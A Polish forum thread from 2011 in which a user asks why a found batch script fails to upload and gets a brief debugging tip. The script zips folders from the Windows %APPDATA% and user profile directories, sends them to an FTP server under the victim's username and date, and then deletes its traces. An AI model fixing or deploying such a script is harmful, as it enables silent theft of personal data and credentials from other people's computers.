Moho Opublikowano 5 Grudnia 2011 Udostępnij Opublikowano 5 Grudnia 2011 Witam Mam taki problem. Znalazłem w internecie taki oto skrypt pod konsolę: GML @echo off set host=FTP set user=LOGIN set pass=HASLO 7z a -tzip new.zip "%APPDATA%\FOLDER1" 7z a -tzip old.zip "%USERPROFILE%\FOLDER" set ext=%USERNAME%--%DATE%--%TiME::=-% echo %ext% echo %user%> data.bot echo %pass%>> data.bot echo cd pass>> data.bot echo binary>> data.bot echo put new.zip %ext%--new.zip>> data.bot echo put old.zip %ext%--old.zip>> data.bot echo syst>> data.bot echo quit>> data.bot ftp -s:data.bot %host% del data.bot del new.zip del old.zip Trochę go modyfikowałem pod własne potrzeby. Chodzi o to żeby program pakował w zip'a dany folder z wyznaczonej mu ścieżki i kopiował go na serwer FTP. Wszystko ładnie, folder jest pakowany, ale problem pojawia się w momencie wysyłania go na serwer, oto co się pojawia w konsoli: Illegal PORT Command Unable[...] i tak dalej. Wszystko jest na zrzucie z ekranu konsoli. Bardzo bym prosił o pomoc, naprawdę zależy mi na takim programie. I nie, nie chcę nikogo okradać z jego osobistych danych! (bo już takie podejrzenia padały), jest do czysto osobistych i bezpiecznych celów. Mógłby ktoś powiedzieć gdzie robię błąd? Albo nawet napisać mi nowy, BARDZO BYM BYŁ WDZIĘCZNY, ślęczę już nad tym ładnych parę godzin i pęka mi głowa bo totalnie nie wiem co robić. Z góry dziękuję i pozdrawiam. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
kt1117 Opublikowano 9 Grudnia 2011 Udostępnij Opublikowano 9 Grudnia 2011 A spróbuj wysłać inny plik na serwer, a jeżeli nie wypluje błędów to spróbuj zapakować bez wysyłania, zobacz, który kod dokładnie sprawia problem i wbij w google, to może coś to da. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi